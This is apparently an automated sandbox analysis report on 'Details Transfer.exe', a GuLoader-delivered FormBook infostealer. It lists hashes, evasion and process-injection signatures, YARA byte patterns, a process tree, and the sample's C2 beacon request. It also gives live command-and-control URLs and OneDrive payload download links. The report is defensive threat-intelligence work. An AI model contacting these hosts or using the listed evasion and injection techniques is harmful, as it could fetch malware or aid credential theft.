Loading ...

Play interactive tourEdit tour

Analysis Report Details Transfer.exe

Overview

General Information

Sample Name:Details Transfer.exe
Analysis ID:298616
MD5:5a68db59b96b39791bc1920adf55e892
SHA1:110d488dda8cea55d1293a532fcb1fcf8e6edd3b
SHA256:cfcc72f5c577d926712f467175daefaddc77a8ec66db29714bcffae22c5cd7d8
Tags:EnduranceexeGuLoader

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Details Transfer.exe (PID: 6716 cmdline: 'C:\Users\user\Desktop\Details Transfer.exe' MD5: 5A68DB59B96B39791BC1920ADF55E892)
    • Details Transfer.exe (PID: 6936 cmdline: 'C:\Users\user\Desktop\Details Transfer.exe' MD5: 5A68DB59B96B39791BC1920ADF55E892)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6580 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 5316 cmdline: /c del 'C:\Users\user\Desktop\Details Transfer.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.472634942.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.301196931.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.305279752.000000001E120000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop ebx12_2_00AF7AFC
      Source: global trafficHTTP traffic detected: GET /tds/?EZA0Ip=cSys95436I04mSADwpQi1ekt4VEAsUhCMEpuZHXtcAsHrFUQZFLk08BXkTL1uisVhU9w&DzuXT=Bzr4g89 HTTP/1.1Host: www.muzickaoprema.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
      Source: global trafficHTTP traffic detected: GET /tds/?EZA0Ip=cSys95436I04mSADwpQi1ekt4VEAsUhCMEpuZHXtcAsHrFUQZFLk08BXkTL1uisVhU9w&DzuXT=Bzr4g89 HTTP/1.1Host: www.muzickaoprema.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: onedrive.live.com
      Source: explorer.exe, 00000005.00000000.281458025.000000000F4D7000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: explorer.exe, 00000005.00000000.275682578.000000000D338000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsof
      Source: Details Transfer.exe, 00000002.00000003.250292065.00000000009FD000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: Details Transfer.exe, 00000002.00000003.250292065.00000000009FD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
      Source: Details Transfer.exe, 00000002.00000003.250333048.00000000009CA000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.airesdeblend.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.airesdeblend.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.airesdeblend.com/tds/www.bilzy.info
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.airesdeblend.comReferer:
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.allianceentdj.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.allianceentdj.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.allianceentdj.com/tds/www.annsrobinson.site
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.allianceentdj.comReferer:
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.ancientroots-healing.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.ancientroots-healing.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.ancientroots-healing.com/tds/www.hualele.net
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.ancientroots-healing.comReferer:
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.annsrobinson.site
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.annsrobinson.site/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.annsrobinson.site/tds/www.ancientroots-healing.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.annsrobinson.siteReferer:
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.bilzy.info
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.bilzy.info/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.bilzy.info/tds/www.myenvi.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.bilzy.infoReferer:
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.charliejonesllc.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.charliejonesllc.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.charliejonesllc.com/tds/www.virtualipassistant.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.charliejonesllc.comReferer:
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.especiaperu.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.especiaperu.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.especiaperu.com/tds/www.muzickaoprema.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.especiaperu.comReferer:
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.hualele.net
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.hualele.net/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.hualele.netReferer:
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.kyomicollection.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.kyomicollection.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.kyomicollection.com/tds/www.allianceentdj.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.kyomicollection.comReferer:
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.muzickaoprema.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.muzickaoprema.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.muzickaoprema.com/tds/www.purepumptech.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.muzickaoprema.comReferer:
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.myenvi.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.myenvi.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.myenvi.com/tds/www.kyomicollection.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.myenvi.comReferer:
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.purepumptech.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.purepumptech.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.purepumptech.com/tds/www.stuticollections.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.purepumptech.comReferer:
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.stuticollections.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.stuticollections.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.stuticollections.com/tds/www.todaysdestinations.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.stuticollections.comReferer:
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.thewanderingcanucks.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.thewanderingcanucks.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.thewanderingcanucks.com/tds/www.charliejonesllc.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.thewanderingcanucks.comReferer:
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.todaysdestinations.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.todaysdestinations.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.todaysdestinations.com/tds/www.thewanderingcanucks.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.todaysdestinations.comReferer:
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.virtualipassistant.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.virtualipassistant.com/tds/
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.virtualipassistant.com/tds/www.airesdeblend.com
      Source: explorer.exe, 00000005.00000002.472675693.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.virtualipassistant.comReferer:
      Source: explorer.exe, 00000005.00000000.272856794.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: Details Transfer.exe, 00000002.00000002.301740842.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
      Source: Details Transfer.exe, 00000002.00000002.301740842.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/#
      Source: Details Transfer.exe, 00000002.00000003.250333048.00000000009CA000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=432009286F6EA0CF&resid=432009286F6EA0CF%21110&authkey=AD4IJ_D
      Source: Details Transfer.exe, 00000002.00000003.250333048.00000000009CA000.00000004.00000001.sdmpString found in binary or memory: https://wtvbxg.am.files.1drv.com
      Source: Details Transfer.exe, 00000002.00000002.301740842.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://wtvbxg.am.files.1drv.com/
      Source: Details Transfer.exe, 00000002.00000002.301740842.0000000000957000.00000004.00000020.sdmpString found in binary or memory: https://wtvbxg.am.files.1drv.com/a
      Source: Details Transfer.exe, 00000002.00000002.301868162.00000000009A1000.00000004.00000020.sdmpString found in binary or memory: https://wtvbxg.am.files.1drv.com/qJk
      Source: Details Transfer.exe, 00000002.00000003.250278357.00000000009F3000.00000004.00000001.sdmpString found in binary or memory: https://wtvbxg.am.files.1drv.com/y4mSG2EAeygiZq04_brgO4pk7tDtOzMyFuiQgTmNd6vFBKuOqsN9bPeMJI63sgTA8uM
      Source: Details Transfer.exe, 00000002.00000003.250465501.00000000009B5000.00000004.00000001.sdmpString found in binary or memory: https://wtvbxg.am.files.1drv.com/y4m_gXgPZ3oxWxrNUMUf4kNQkfH2Qjv3iriglx6tl4Vi-9FIRKJZdSRHkJJ_DBj7L0v
      Source: Details Transfer.exe, 00000002.00000003.250292065.00000000009FD000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.472634942.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.301196931.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.305279752.000000001E120000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.472634942.0000000000F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000C.00000002.472634942.0000000000F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000002.00000002.301196931.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.301196931.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000C.00000002.471837023.0000000000BA2000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000C.00000002.476551584.000000000534F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000002.00000002.305279752.000000001E120000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000002.00000002.305279752.000000001E120000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F4151A NtWriteVirtualMemory,0_2_04F4151A
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F40208 EnumWindows,NtSetInformationThread,TerminateProcess,LoadLibraryA,0_2_04F40208
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F433D0 NtSetInformationThread,TerminateProcess,LoadLibraryA,0_2_04F433D0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F4378D NtProtectVirtualMemory,0_2_04F4378D
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F43B69 NtSetInformationThread,TerminateProcess,NtResumeThread,0_2_04F43B69
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F40CE1 NtWriteVirtualMemory,0_2_04F40CE1
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F41005 NtWriteVirtualMemory,0_2_04F41005
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F42982 NtWriteVirtualMemory,0_2_04F42982
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F40295 NtSetInformationThread,TerminateProcess,0_2_04F40295
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F40247 NtSetInformationThread,TerminateProcess,0_2_04F40247
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F41622 NtWriteVirtualMemory,0_2_04F41622
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F417FA NtWriteVirtualMemory,0_2_04F417FA
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F43BED NtResumeThread,0_2_04F43BED
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F43BC0 NtResumeThread,0_2_04F43BC0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F43B98 NtResumeThread,0_2_04F43B98
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F43B81 NtResumeThread,0_2_04F43B81
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_1E3B9660
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_1E3B96E0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9710 NtQueryInformationToken,LdrInitializeThunk,2_2_1E3B9710
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_1E3B97A0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9780 NtMapViewOfSection,LdrInitializeThunk,2_2_1E3B9780
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9540 NtReadFile,LdrInitializeThunk,2_2_1E3B9540
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B95D0 NtClose,LdrInitializeThunk,2_2_1E3B95D0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9A20 NtResumeThread,LdrInitializeThunk,2_2_1E3B9A20
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_1E3B9A00
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9A50 NtCreateFile,LdrInitializeThunk,2_2_1E3B9A50
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_1E3B9860
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9840 NtDelayExecution,LdrInitializeThunk,2_2_1E3B9840
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B98F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_1E3B98F0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_1E3B9910
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B99A0 NtCreateSection,LdrInitializeThunk,2_2_1E3B99A0
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9610 NtEnumerateValueKey,2_2_1E3B9610
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9670 NtQueryInformationProcess,2_2_1E3B9670
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B9650 NtQueryValueKey,2_2_1E3B9650
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 2_2_1E3B96D0 NtCreateKey,2_2_1E3B96D0
